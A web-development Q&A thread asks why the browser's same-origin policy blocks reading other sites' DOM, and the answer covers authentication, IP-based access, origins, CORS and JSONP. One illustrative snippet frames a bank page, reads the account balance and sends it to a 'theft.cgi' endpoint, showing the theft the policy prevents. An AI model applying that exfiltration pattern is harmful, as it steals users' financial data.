I want to scrape pages client-side rather than server-side. However, the same-origin policy prevents me from doing this.

What I'm trying to understand is why I don't have read only access to the DOM of another site.

What security risk does this pose to the site if I can get the same information by pulling the page onto the server and accessing it anyway?

I simply want to pull basic information from a page like:

document.title

If I can do this server-side, why not client-side? The main difference is the extra round trip, which I don't want to pay for.

Obviously users' data should not be accessible; I don't need information on this. But in the same way that I can pull in a generic version of a page using

file_get_contents

and parse the DOM, I would like to do the same client-side.

What is the technical limitation that stops JavaScript from telling the difference between user-specific data and generic page data?

PHP can do it.

Why can't JavaScript?

What is the limitation?

I don't necessarily want to circumvent it or hack it, but to understand its purpose better and maybe find that it does not apply to the case I have: client-side page scrapes.

Related

Ways to circumvent the same-origin policy

Same origin policy

How are bookmarklets( javascript in a link ) verfied by servers? How is security kept?

http://en.wikipedia.org/wiki/Representational_state_transfer#Central_principle

  • Hiro, please, please, *please*, **please** watch the spelling of tags. I keep having to point this out to you. :p – Charles Sep 07 '12 at 17:31

1 Answer

why I don't have read only access to the DOM of another site

The data that your user can access on any given site may not be the same as the data you can access on that site.

Since users might be identified by all sorts of things, including IP address, there is no way for the browser to sanitize the data of all personal information.
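
To make the IP address case concrete, here is a minimal sketch of a hypothetical server that decides what to send purely from the source address of the request. The function name `renderWikiPage`, the `10.` office prefix, and both addresses are made up for illustration; no real site is being described.

```javascript
// Hypothetical server-side logic: anyone on the office LAN (assumed here to
// be 10.x.x.x) is treated as authenticated, with no cookie or login involved.
function renderWikiPage(sourceIp) {
    var isOfficeLan = sourceIp.indexOf('10.') === 0;
    return isOfficeLan
        ? '<title>Wiki (internal)</title><p>Confidential notes</p>'
        : '<title>Wiki</title><p>Public notes</p>';
}

// A request made by script in the user's browser leaves from the user's machine.
var seenFromUsersBrowser = renderWikiPage('10.0.0.5');

// A request made by your own scraping server leaves from your server.
var seenFromYourServer = renderWikiPage('203.0.113.7');

console.log(seenFromUsersBrowser === seenFromYourServer); // false
```

The same URL yields two different documents, and nothing the browser could strip from the request would change which one the user's machine receives.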

Overly simplistic illustration:

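<iframe src="your bank" id="frame"></iframe>
<script>
    // If cross-origin DOM reads were allowed, any page could do this:
    var bank = document.getElementById('frame').contentDocument;
    var stolen = bank.getElementById('account_balance').innerText;
    // ajax() stands in for any function that sends data to the attacker's server
    ajax('theft.cgi', stolen);
</script>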
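
The browser blocks that read because the framed page and the embedding page have different origins. As a rough sketch of the comparison (assuming ordinary `http`/`https` URLs; the helper name `sameOrigin` and the example hosts are made up), two URLs share an origin only when scheme, host, and port all match:

```javascript
// Two URLs share an origin only if scheme, host, and port all match.
// Uses the standard URL API, available in browsers and in Node.js.
function sameOrigin(a, b) {
    return new URL(a).origin === new URL(b).origin;
}

console.log(sameOrigin('https://example.com/a', 'https://example.com/b'));    // true
console.log(sameOrigin('https://example.com/', 'http://example.com/'));       // false (scheme differs)
console.log(sameOrigin('https://example.com/', 'https://bank.example.com/')); // false (host differs)
console.log(sameOrigin('https://example.com/', 'https://example.com:8443/')); // false (port differs)
```

Note that the path plays no part in the comparison, so the check cannot tell a "generic" page from a personalised one on the same site.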
Quentin
  • But why can't .js Pull in a non-user authenticated page...i.e. one with no user data? –  Sep 07 '12 at 13:12
  • @HiroProtagonist — The request is coming from the user's browser. How is the server supposed to know not to send them the authenticated page? – Quentin Sep 07 '12 at 13:12
  • `Obviously user's data should not be accessible, and this is obvious and I don't need information on this.` –  Sep 07 '12 at 13:12
  • Server responds to Client request....it does what client tells it to do....REST principle maybe...I dunno. –  Sep 07 '12 at 13:13
  • @HiroProtagonist — How is the client supposed to tell the server not to send the authenticated page? – Quentin Sep 07 '12 at 13:14
  • you tell me...it's my question and your answer...:) –  Sep 07 '12 at 13:15
  • @HiroProtagonist — It can't. That's why you can't do what you want. – Quentin Sep 07 '12 at 13:17
  • This is perhaps a design inconsistency with .js...if php can do it .js should be able to as well....JavaScript Global object - `fileGetGeneric()` or something....if you have any info. on how the language is designed I would like to read...ES5 is more the interface I think. –  Sep 07 '12 at 13:24
  • PHP runs on the server. JavaScript runs on the client. If the authentication system is "User has an IP address on the office LAN therefore they get access to more of the wiki", there is no way that something on the client could give different authentication information (the IP address) to normal. The server, which is under the control of a third party who isn't inside the office, would have a different IP and wouldn't be authenticated. PHP running on a server inside the office would also get the authenticated version as it would have an internal IP address. – Quentin Sep 07 '12 at 13:26
  • This isn't PHP Vs. JavaScript. This is "The user's browser" vs "The website's server". – Quentin Sep 07 '12 at 13:27
  • Coffee makes me think...why not just ajax the page in and then either parse it directly or add it to the DOM using .innerHTML...this would pretty much do what I need....Client can hit the server with whatever it wants with Ajax....just make a GET request directly...authentication information does not have to be part of the client-server communications....it is stored in a cookie or localStorage as a hash...just don't send it....now you are anonymous or not logged in. –  Sep 07 '12 at 16:19
  • Ajax means "Making HTTP requests without leaving the page". That will be subject to the same origin policy. – Quentin Sep 07 '12 at 16:20
  • "authentication information does not have to be part of the client-server communications" The browser has no way of knowing what data is authentication information and what is not, and some potential information cannot be removed from the request (e.g. the source IP address in the earlier example). **It cannot be separated**. – Quentin Sep 07 '12 at 16:21
  • Are you saying I can't make an Ajax request to a file on say twitter.com?.....I just want to verify. –  Sep 07 '12 at 16:21
  • You can make an Ajax request. You can't read the response unless you are granted permission with CORS or the same origin policy is circumvented by JSONP. – Quentin Sep 07 '12 at 16:22
  • but I can pull favicons from any server I want with nothing advanced....somehow .js (in browser) knows the difference between images and files when I do an Ajax GET...are you certain on this? –  Sep 07 '12 at 16:23
  • Displaying content from other origins to the user has always been possible. You can't read it with JS. If you fetched a favicon via XHR from a different origin then you wouldn't be able to read the data. – Quentin Sep 07 '12 at 16:29
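
The rule from the last few comments (the request can be sent, but the response can only be read from the same origin or with CORS permission) can be sketched roughly as below. This is a simplified model, not the browser's actual implementation: the function name `scriptMayRead`, the example URLs, and the assumption that header names arrive lower-cased are all illustrative, and preflight requests are ignored.

```javascript
// Simplified model of the browser's decision: may the script running on
// pageUrl read a response that came from responseUrl with these headers?
// Header names are assumed to be lower-cased already.
function scriptMayRead(pageUrl, responseUrl, headers, sentCredentials) {
    var pageOrigin = new URL(pageUrl).origin;
    if (pageOrigin === new URL(responseUrl).origin) {
        return true; // same origin: no permission needed
    }
    var allowed = headers['access-control-allow-origin'];
    if (sentCredentials) {
        // With cookies attached, the wildcard does not count and the server
        // must also opt in to credentials explicitly.
        return allowed === pageOrigin &&
            headers['access-control-allow-credentials'] === 'true';
    }
    return allowed === '*' || allowed === pageOrigin;
}

var page = 'https://scraper.example/index.html';
var target = 'https://other.example/page.html';

console.log(scriptMayRead(page, target, {}, false));                                      // false
console.log(scriptMayRead(page, target, { 'access-control-allow-origin': '*' }, false)); // true
console.log(scriptMayRead(page, target, { 'access-control-allow-origin': '*' }, true));  // false
```

In every case it is the other site's server that grants read access; the requesting page cannot grant it to itself.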